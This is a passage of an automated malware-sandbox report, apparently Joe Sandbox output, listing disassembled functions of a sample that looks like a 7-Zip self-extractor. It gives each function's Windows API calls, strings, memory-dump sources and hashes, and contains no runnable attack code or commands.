Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
Opcode Fuzzy Hash: b801c6dde5252ceaa95e99b7edc6e22ccd73079f9f68863dc15d2a8854d6de70
Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

Function 00403354 Relevance: 10.6, APIs: 7, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D

Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
String ID:
API String ID: 846840743-0
Opcode ID: 66febfc4c2029f219a7dc68f148c7269b5402702ab5f24a925c92116b663e397
Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
Opcode Fuzzy Hash: 66febfc4c2029f219a7dc68f148c7269b5402702ab5f24a925c92116b663e397
Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

Function 00404405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51

Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119

Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
wsprintfW.USER32 ref: 004044A7

Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71

#17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533

Strings

IA, xrefs: 0040447B
7zSfxFolder%02d, xrefs: 004044A1

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d$IA
API String ID: 3387708999-1317665167
Opcode ID: 79285842cd47b5abb211c01a777ae7e1b24040997c111ecd28553c2a093b01fa
Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
Opcode Fuzzy Hash: 79285842cd47b5abb211c01a777ae7e1b24040997c111ecd28553c2a093b01fa
Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

Function 00408EA4 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59

Strings

IA, xrefs: 00409391
IA, xrefs: 00409225

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@
String ID: IA$IA
API String ID: 1033339047-1400641299
Opcode ID: 7402ad71c3df89009bcca6447dc192685c66d640a39f4103aae4a4fab3f3137f
Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
Opcode Fuzzy Hash: 7402ad71c3df89009bcca6447dc192685c66d640a39f4103aae4a4fab3f3137f
Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

Function 00410CD0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 23
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00410D0D

Strings

HKA, xrefs: 00410CE9
4KA, xrefs: 00410CF0
\KA, xrefs: 00410CE2
$KA, xrefs: 00410CF7

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: free
String ID: $KA$4KA$HKA$\KA
API String ID: 1294909896-3316857779
Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

Function 004096C7 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004096D0
??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941

Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B

Strings

HIA, xrefs: 0040978B

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@$H_prolog
String ID: HIA
API String ID: 3431946709-2712174624
Opcode ID: 3dcc1a3fe120ce7f2c594cfa04f860259f569253507d2a08ae97171331bd6f56
Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
Opcode Fuzzy Hash: 3dcc1a3fe120ce7f2c594cfa04f860259f569253507d2a08ae97171331bd6f56
Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

Function 00402844 Relevance: 6.4, APIs: 5, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
memcmp.MSVCRT(?,?,?), ref: 004028E4
memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: lstrlenmemcmp$memmove
String ID:
API String ID: 3251180759-0
Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

Function 0040150B Relevance: 6.1, APIs: 4, Instructions: 100
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570

Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
API String ID: 359084233-0
Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

Function 00401986 Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID:
API String ID: 635176117-0
Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

Function 00404A44 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000021,?,00405D20,?,00417788,00417788), ref: 00404A5A
??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC

Strings

ExecuteFile, xrefs: 00404A48

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@
String ID: ExecuteFile
API String ID: 1033339047-323923146
Opcode ID: ddddc352d45356e59f769561758ce12b54d09949a17630eb614c7359ca8f5a4f
Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
Opcode Fuzzy Hash: ddddc352d45356e59f769561758ce12b54d09949a17630eb614c7359ca8f5a4f
Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

Function 0040ADC3 Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: 05f36dbfb7a58d9fcd8f34d107677a54faebb06990fcd4d8571633681916b41d
Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
Opcode Fuzzy Hash: 05f36dbfb7a58d9fcd8f34d107677a54faebb06990fcd4d8571633681916b41d
Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A

Function 0040245A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E

Strings

@, xrefs: 00402471

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 5ff2dfdd56dec2a5a5c377c1c31be187797b995f0c54d640c9ef9d6a9fd1637f
Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
Opcode Fuzzy Hash: 5ff2dfdd56dec2a5a5c377c1c31be187797b995f0c54d640c9ef9d6a9fd1637f
Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D

Function 0040C9FC Relevance: 3.2, APIs: 2, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5

Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$??2@ExceptionThrowmemmove
String ID:
API String ID: 4269121280-0
Opcode ID: d1d5542d106b2cdafdaa32fb19a738a2b8d61d2174dbe5d07d94aeecd6dafa49
Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
Opcode Fuzzy Hash: d1d5542d106b2cdafdaa32fb19a738a2b8d61d2174dbe5d07d94aeecd6dafa49
Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99

Function 0040A62F Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A634
??3@YAXPAX@Z.MSVCRT(?), ref: 0040A729

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@H_prolog
String ID:
API String ID: 1329742358-0
Opcode ID: 022c29a744621237163180da95b687a83dd35658c2d9e2dd944db09434d0a69c
Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
Opcode Fuzzy Hash: 022c29a744621237163180da95b687a83dd35658c2d9e2dd944db09434d0a69c
Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B

Function 0040112B Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 28db9cfd60cb3fb0a98a5434b63424f1a9b1fdf2608077bf16c4e34c875029e8
Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
Opcode Fuzzy Hash: 28db9cfd60cb3fb0a98a5434b63424f1a9b1fdf2608077bf16c4e34c875029e8
Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754

Function 004022B0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022C0
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022E4

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: cb066a32d6fc84c7f2b6a08c951bf6048ceb161d563f20fdbabff66222ef7d09
Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
Opcode Fuzzy Hash: cb066a32d6fc84c7f2b6a08c951bf6048ceb161d563f20fdbabff66222ef7d09
